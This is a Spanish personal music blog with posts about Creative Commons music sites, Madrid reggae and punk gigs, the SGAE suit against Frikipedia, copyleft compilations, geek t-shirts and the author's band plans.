Os dejo un par de enlaces que he visto en Microsiervos. Son links a páginas con música clásica libre de derechos, y lista para descargar. Yas sabeis, CreativeCommons Rulez!!

http://en.wikipedia.org/wiki/Wikipedia:Sound/list

http://www.classiccat.net/

REGGAE NEWS

Leo en reggae-news:

The Red Mussel Crew vuelve a la carga con una sesión repleta de sonidos jamaicanos añejos para haceros disfrutar como locos la noche del Viernes 17 de Febrero.

Una vez más, sus selectores hilarán fino para ofrecer lo mejor de la música jamaicana y que vuestros zapatos no puedan aguantar el trote. Como siempre, la base de operaciones será La Vaca Austera (C/Palma, 20 Metro: Tribunal o Noviciado, Madrid) y la sesión comenzará también como siempre a las 22:00.

Amplía esta información a través del mail info@redmusselcrew.com o visita www.redmusselcrew.com

El próximo Jueves 23 de Febrero, como cada último Jueves de mes, los selectors del colectivo madrileño Up Town Pleasure ofrecerán una sesión de soul, ska, mod jazz y reggae en Beer Station (C/Cuesta de Santo Domingo 23, Metro: Santo Domingo o Callao, Madrid).

El acceso al local es libre y la sesión abarcará de 22:30 a 3:00.

Amplía esta información a través de http://www22.brinkster.com/uptownpleasure/




KONZIERTO POR LA OKUPACION

Fecha: 4 de Marzo.
Lugar: Pueblo okupado de Navalkejigo

SENSA YUMA (Punk old scholl from UK)
MATANDO GRATIX (Punk rock Vallekano)
MINISTERS DEL RONSTEEADY (Ska, funky, reggae)
MAJAICANS (Reggae roots majariego)
ANTIMATERIA (Punk from the mountains)

concierto MINISTER

Alguien se apunta? ska del bueno. Es el sábado 11, en gruta77. Cuesta 7 eurillos.

HIJOS DE ****

stisLeo con asombro en MicroSiervos la nueva SUB******AD de la $GA€. Han denunciado a la frikipedia, por el articulo que en ella les dedicaban.

La frikipedia, un wiki donde el humor es el protagonista, donde todos podiamos aportar alguna definición hilarante.

Pues bien, los chicos de la $GA€ consideran que el articulo sobre ellos son "Injurias y daños al honor". No es una parodia. No es humor. Son injurias y daños al honor.

De momento el juez ha cerrado el servidor, y el creador de la frikipedia se enfrenta a una multa de hasta 12.000€.

Por suerte, en la Uncyclepedia hay una copia del artículo original.


Hijos de p***!!!

(y lo de los asteriscos es porque los de la sgae se dedican a buscar en internet. El insulto queda ahi, pero asi no tocan los cojones)

Muchas Noticias

Eeeeeee que os parecen las noticias? Como sigamos asi, la proxima vez que encendais la televisión vais a ver a Pedro Piqueras entrevistando al Hombre Sin Remedio!!!! jajajajajajajajaja
Aupa ahi!!

Me comentaba ayer Alfredo (mi tutor del PFC) un par de nombres que yo no conocía. Ya se están bajando del emule....

ALEX UNDER (CMYKmusik/Apnea).
Artífice y responsable de la revitalización del techno más personal, Alex Under diseña complejos espacios rítmicos que se nutren de toda una suerte de elementos dispares, tomados del día a día, deconstruyendo así una realidad que en sus manos acerca fronteras de muy diferentes territorios electrónicos. Dueño de CMYKmusik y de la plataforma
Net 28, en febrero debutará en el mítico Plus 8, sello de Richie Hawtin.

IA BERICOCHEA (Rojo/Minus).
Otro joven talento madrileño y el primer artista nacional en grabar para
Minus (Richie Hawtin), Ignacio Bericochea despliega su pasión por las estructuras rítmicas más profundas y detallistas, minimales y de una belleza desoladora. Nos presentará su nuevo álbum, Sueño, con el que debuta en su recién creado label, Rojo, en un concierto para el que también ha creado momentos originales, fundiéndose con unas imágenes que hablan de movimiento natural y abstracto, en perfecta sintonía con su música, sumergiéndonos en un océano de formas.

Las Aventuras del Doctor Esponja

[Capítulo 345. Temporada VI. "Las Aventuras del Doctor Esponja".]

...en el episodio anterior vimos como nuestro superhéroe el Doctor Esponja se enfrentó al terrible lider de los Despojos Mutantes en el planeta Beta. Tras una heróica lucha, el Doctor Esponja derrotó al malvado tirano y a sus viles secuaces. Pero el combate fué duro, y causó estragos en nuestro héroe. Su Piedra de Poder Esponjiforme se estaba agotando, y sin ella sus superpoderes se estaban debilitando por momentos...
¿Descubrán los villanos este momento de flaqueza? ¿Conseguirá el Doctor Esponja salir con vida del planeta Beta? No se pierdan el próximo episodio!!!!
(...)


Jajajja. Como me lo paso....En fin.Habeis escuchado er temita de Manolo Kabezabolo? y la remezcla para el cutre-proyecto Liberus? Que os parecen? Ideas? Comentarios? Insultos? Al Mato no le insulteis que se me cabrea!! jajajaja No se , lo que querais.

Ya tengo unas cuantas canciones (4-5) para el nuevo proyecto (todavia sin nombre). Les estoy metiendo voces sampleadas de por ahí. Algunas las he sacado de una página web....incredible!!! Echadle un ojo. En especial a la sección de "Acapellas":

http://ccmixter.org/

Se trata de la página web de una comunidad de músicos que publican sus canciones bajo licencia Creative Commons. Es que esto del copyleft es la caña de España!!


Bueno, próximamente mas aventuras de nuestro personaje estrella.

Concierto

Que pasa niggas! Este viernes tocan El Quinto Parpadeo. Un grupillo de flamenco-reggae fusión muy del rollito de Canteca de Macao. Nada, que el que quiera venirse, pues que se venga. Yo voy de cabeza. Lucia y Sandra también. Elena dice que se apunta y a lo mejor Cándido también (ETSIT power) . alguien mas?

Proyecto Libertad Musical


El Hombre Sin Remedio (a.k.a. Señor de los Refritos, a.k.a. Robameriendas de alquiler) participa en otra nueva iniciativa por la música libre. Nada de derechos de autor, nada de copyrigth ni nada de sistemas anticopia. Al revés: que se lo copie todo el mundo, que se lo descargue hasta mi abuela.

Con estos principios se presenta el proyecto "Mi música es libre, y tu?". Un recopilatorio enmarcado en el proyecto Libertad Musical. Un recopilatorio de artistas decididos a darle caña a esto del copyleft. Ya sabeis: todo el mundo lo puede descargar, distribuir, copiar y modificar, siempre que no obtenga beneficios económicos de ello y siempre que mencione al autor original.

Participan en este proyecto artistas como
Lameka55, DJ Makei, etc....
Musicalmente es un recopilatorio bastante irregular. Hay temas de todos los estilos (hiphop, electro, rock, house....), unos con muy buen nivel...y otros no tanto. Y ahí es donde entra
HSR, para darle un toque de magia esto. Ha remezclado un tema de Evil Brothers de este recopilatorio dandole a este tema de hard-techno un toque de electro made in HSR.


Camisetas frikis

Me parto por todos los lados. Vaya camisetas mas guapas. Os dejo un par de links de tiendas on-line de camisetas geek.

http://www.syswear.com/

http://www.thinkgeek.com/tshirts/all/


Os dejo un par de ejemplillos:






Me quedo con esa que pone "FREE THE MALLOCS", o la que aparece una mano con las letras w a s d.


COMUNICADO INTERNO

Estimados camaradas:

Llevo 2 meses preocupado, dándole vueltas a lo del FEA (recordemos que Doctor Esponja y los Enfermeros Electrosónicos fueron invitados a tocar en el Festival Electrónico Alternativo 2006), y esta mañana he tomado una decisión. Acabo de mandar un correo a Xavi, uno de los organizadores diciendole, que NO vamos a ir.

Motivos? pues porque no tengo ganas de organizar un concierto, ni ensayos ni fotos ni nada de nada. No me atrevo a meterme en mas marrones, mas tinglaos de los que ya tengo. Y se que todo esto del concierto iba a ser un marrón muy grande para mi. Paso de marrones.

Lo siento sobretodo por Rulo, que es al que mas ilusión le hacía.

En fin.....habrá que pensar en un nuevo proyecto musical. De momento no se muy vien de que estilo, pero bueno. Sea lo que sea, deberá contener: Guitarras, música electrónica y Javi Moreno como cantante. El resto...está por ver. Desde luego se aceptan sugerencias: estilos, versiones, colaboraciones, etc...

Bueno, nada mas.
Se despide el camarada Sin Remedio

Bye

FELIZ RESACA 2006

Feliz año a todos!!

Que? Mucha resaca? Es lo propio de estas fechas.... En fin, es lunes...y estamos en el curro. Otra cosa es que sea capaz de currar algo.

Año nuevo vida nueva. A ver si somos capaces de cumplir alguna promesa de año nuevo, no?
Esa maqueta que se van a currar Kurko+Bace+Buitre+Luis. O la que quiere sacar Josek, o el maldito concierto en Barcelona, que me trae de cabeza.
De momento voy a esperar que mi carta a los reyes magos les llegue a tiempo. Les he pedido una novia, un coche, y un contrato discográfico multimillonario. Me traerán unos calcetines...


Os dejo con una bonita frase:

"El camino recto no conduce a ninguna parte más que al objetivo." -André Gide (1869–1951), escritor francés.

Entradas más recientes Entradas antiguas Inicio

Blogger Template by Blogcrowds